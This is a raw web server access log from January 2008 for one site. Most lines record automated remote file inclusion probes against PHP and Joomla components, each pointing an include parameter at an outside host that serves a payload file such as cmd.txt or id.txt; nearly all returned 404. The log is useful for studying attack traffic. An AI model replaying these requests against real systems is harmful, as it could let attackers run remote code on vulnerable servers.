213.239.177.121 - - [06/Jan/2008:07:34:25 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.217.130 - - [06/Jan/2008:07:34:30 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.221.179.200 - - [06/Jan/2008:07:34:36 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:34:36 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.179.200 - - [06/Jan/2008:07:34:36 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:34:36 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.179.200 - - [06/Jan/2008:07:34:36 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:34:36 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:34:49 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:34:49 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:34:49 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.168.186 - - [06/Jan/2008:07:35:02 -0800] "GET /logs/access_071229.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:35:07 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:35:08 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:35:13 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.96 - - [06/Jan/2008:07:35:20 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [06/Jan/2008:07:35:20 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [06/Jan/2008:07:35:31 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:35:34 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:35:34 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:35:34 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:07:35:53 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:07:35:53 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
67.19.192.212 - - [06/Jan/2008:07:36:02 -0800] "GET /logs/access_071221.log/skin/zero_vote/ask_password.php?dir=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.31.186.231 - - [06/Jan/2008:07:36:08 -0800] "GET /logs/access_071221.log/skin/zero_vote/ask_password.php?dir=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.38 - - [06/Jan/2008:07:36:39 -0800] "GET /tmp/?D=A HTTP/1.0" 200 1319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:36:45 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [06/Jan/2008:07:36:58 -0800] "GET /logs/access_071222.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.207 - - [06/Jan/2008:07:37:53 -0800] "GET /minamijewelry/html/flower.html HTTP/1.0" 200 20957 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:38:00 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:38:00 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:38:15 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:38:25 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:38:28 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [06/Jan/2008:07:40:21 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:07:42:57 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:07:42:57 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
65.44.220.52 - - [06/Jan/2008:07:43:53 -0800] "GET /pathway.php?page=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
65.44.220.52 - - [06/Jan/2008:07:43:54 -0800] "GET /logs/pathway.php?page=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
201.236.111.227 - - [06/Jan/2008:07:46:12 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.236.111.227 - - [06/Jan/2008:07:46:18 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.236.111.227 - - [06/Jan/2008:07:46:24 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:46:35 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:46:38 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:46:40 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:46:58 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:47:01 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:47:09 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:47:20 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:47:23 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:47:33 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:47:36 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:47:38 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:47:39 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:47:40 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:47:43 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:49:11 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:49:17 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:49:19 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.168.245.227 - - [06/Jan/2008:07:52:41 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.168.245.227 - - [06/Jan/2008:07:52:41 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.168.245.227 - - [06/Jan/2008:07:52:41 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [06/Jan/2008:07:52:50 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [06/Jan/2008:07:52:51 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [06/Jan/2008:07:52:51 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.173.115 - - [06/Jan/2008:07:54:15 -0800] "GET /logs/access_071229.log//send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.115 - - [06/Jan/2008:07:54:15 -0800] "GET //send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.115 - - [06/Jan/2008:07:54:15 -0800] "GET /logs//send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.16.224.119 - - [06/Jan/2008:07:54:35 -0800] "GET /logs/access_071224.log//components/com_forum/download.php?phpbb_root_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [06/Jan/2008:07:54:35 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [06/Jan/2008:07:54:36 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [06/Jan/2008:07:55:01 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [06/Jan/2008:07:55:02 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [06/Jan/2008:07:55:02 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:59:13 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:59:15 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [06/Jan/2008:07:59:25 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.115 - - [06/Jan/2008:07:59:49 -0800] "GET /logs/access_071220.log//send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.115.186.10 - - [06/Jan/2008:08:00:37 -0800] "GET /logs/access_071229.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.115.186.10 - - [06/Jan/2008:08:00:37 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.115.186.10 - - [06/Jan/2008:08:00:37 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.254.58.42 - - [06/Jan/2008:08:01:01 -0800] "GET /routines/fieldValidation.php?jssShopFileSystem=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
65.254.58.42 - - [06/Jan/2008:08:01:01 -0800] "GET /logs/routines/fieldValidation.php?jssShopFileSystem=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
66.249.70.241 - - [06/Jan/2008:08:03:02 -0800] "GET /megumi/earrings/3_Venetian_Blue_Purp_15.JPG HTTP/1.1" 200 2349964 "-" "Googlebot-Image/1.0" "www.dmulk.com"
85.31.186.231 - - [06/Jan/2008:08:03:58 -0800] "GET /logs/access_071229.log/skin/zero_vote/ask_password.php?dir=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.3.225.228 - - [06/Jan/2008:08:04:03 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12 (KHTML, like Gecko) Version/3.0.4 Safari/523.12" "www.dmulk.com"
86.3.225.228 - - [06/Jan/2008:08:04:04 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.dmulk.com/presto/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12 (KHTML, like Gecko) Version/3.0.4 Safari/523.12" "www.dmulk.com"
86.3.225.228 - - [06/Jan/2008:08:04:08 -0800] "GET / HTTP/1.1" 200 2962 "http://www.dmulk.com/presto/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12 (KHTML, like Gecko) Version/3.0.4 Safari/523.12" "www.dmulk.com"
64.72.180.111 - - [06/Jan/2008:08:04:34 -0800] "GET /logs/access_071222.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.19 - - [06/Jan/2008:08:06:14 -0800] "GET /logs/access_070829.log HTTP/1.0" 200 34921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.217.130 - - [06/Jan/2008:08:08:21 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.173.100 - - [06/Jan/2008:08:09:35 -0800] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.93.173.100 - - [06/Jan/2008:08:09:35 -0800] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
84.16.224.119 - - [06/Jan/2008:08:10:48 -0800] "GET /logs/access_071205.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.192.212 - - [06/Jan/2008:08:11:10 -0800] "GET /logs/access_071229.log/skin/zero_vote/ask_password.php?dir=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.156 - - [06/Jan/2008:08:11:30 -0800] "GET /logs/access_070720.log HTTP/1.0" 200 29646 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.50.14.189 - - [06/Jan/2008:08:12:09 -0800] "GET /logs/access_071222.log//convert/mvcw_conver.php?step=1&vwar_root=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [06/Jan/2008:08:12:09 -0800] "GET //convert/mvcw_conver.php?step=1&vwar_root=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [06/Jan/2008:08:12:09 -0800] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [06/Jan/2008:08:13:27 -0800] "GET /logs/access_071127.log//convert/mvcw_conver.php?step=1&vwar_root=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.123.117.78 - - [06/Jan/2008:08:16:55 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.gcfps.org/bbs/skin/zero_vote/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.91.10 - - [06/Jan/2008:08:17:15 -0800] "GET /logs/access_071222.log//convert/mvcw_conver.php?step=1&vwar_root=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.91.10 - - [06/Jan/2008:08:17:15 -0800] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.91.10 - - [06/Jan/2008:08:17:15 -0800] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.123.117.78 - - [06/Jan/2008:08:17:41 -0800] "GET /convert/mvcw.php?vwar_root=http://www.gcfps.org/bbs/skin/zero_vote/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.91.10 - - [06/Jan/2008:08:18:38 -0800] "GET /logs/access_071127.log//convert/mvcw_conver.php?step=1&vwar_root=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.213 - - [06/Jan/2008:08:18:51 -0800] "GET /convert/mvcw.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.92.82 - - [06/Jan/2008:08:18:56 -0800] "GET /logs/index.php?mnu=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
